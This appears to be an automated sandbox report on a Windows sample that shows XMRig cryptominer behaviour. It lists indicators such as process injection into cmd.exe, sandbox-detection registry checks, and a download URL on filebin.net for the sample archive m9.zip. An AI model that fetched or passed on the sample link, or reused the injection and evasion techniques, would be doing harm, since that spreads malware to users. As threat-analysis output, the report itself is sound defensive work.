Analysis
-
max time kernel
1799s -
max time network
1795s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
14-07-2024 15:22
Static task
static1
URLScan task
urlscan1
Malware Config
Signatures
-
XMRig Miner payload 11 IoCs
resource yara_rule behavioral1/memory/3024-83-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/3024-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/3024-87-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/3024-89-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/3024-92-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/3024-93-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/3024-95-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/3024-91-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/3024-90-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/3024-110-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/3024-111-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 79 3024 cmd.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1892 set thread context of 3024 1892 conhost.exe 102 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 3c836a5743d2da01 iexplore.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d05635cc01d6da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118849" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051c0b768fca2ba44bd953be6973682e30000000002000000000010660000000100002000000011fec54beb21b484b4028fb1e1ebe9d91e3e042579da98eea9791c7f4852ea28000000000e8000000002000020000000dfededf2aca27528468114d00456e8ab1ed1ef7559fdb60663806a0984de3960200000000ef420866d7bc3b69f1d4f3a46a83d57998cca881916d30413e3e1f687ed2a5c40000000314bc6869209d06a48c4bc51e703ffc2f3f521228b6d882d6582e4898e90aec0f78df9212ced70bcce1592e27a79c9bb3ebb8d7f262c04555a0190967cc23ef5 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3414802104" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3410114128" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0b92bcc01d6da01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051c0b768fca2ba44bd953be6973682e300000000020000000000106600000001000020000000779e188924a43e15375ccf3b686fe42ada2fa80e60267123608d5cb9ae88b12f000000000e80000000020000200000007af4fdfce3ed4d1444a1d55a73a43f0ed69f85b2a531b4ffd9dd076264ee46a42000000084b03debef972c1ede67a4cf8818b03bce051949ee1d6807501ae6323c5e7e7340000000a231e2dfe8322f34a513ca69d48691eebae3921a419fe296dc0d2f5d8c677ef4af9c12a0d26df26bb4ad8a74ad036197f55b1a20a3fa851eb46afaf5710cb044 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{AC284771-3B15-45BB-A5EA-9C83B3211497}" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31118849" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31118849" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "427735558" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{F6ECBBF5-41F4-11EF-8956-6E4A691D7979} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3410114128" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE -
Modifies registry class 45 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 iexplore.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 876 iexplore.exe 4832 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1892 conhost.exe Token: SeLockMemoryPrivilege 3024 cmd.exe Token: SeLockMemoryPrivilege 3024 cmd.exe Token: SeDebugPrivilege 4832 taskmgr.exe Token: SeSystemProfilePrivilege 4832 taskmgr.exe Token: SeCreateGlobalPrivilege 4832 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 876 iexplore.exe 876 iexplore.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe 4832 taskmgr.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 876 iexplore.exe 876 iexplore.exe 4132 IEXPLORE.EXE 4132 IEXPLORE.EXE 4132 IEXPLORE.EXE 4132 IEXPLORE.EXE 876 iexplore.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 876 wrote to memory of 4132 876 iexplore.exe 83 PID 876 wrote to memory of 4132 876 iexplore.exe 83 PID 876 wrote to memory of 4132 876 iexplore.exe 83 PID 316 wrote to memory of 1892 316 m9.exe 100 PID 316 wrote to memory of 1892 316 m9.exe 100 PID 316 wrote to memory of 1892 316 m9.exe 100 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 PID 1892 wrote to memory of 3024 1892 conhost.exe 102 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://filebin.net/48zrpcycjim0b4uz/m9.zip1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:876 CREDAT:17410 /prefetch:22⤵
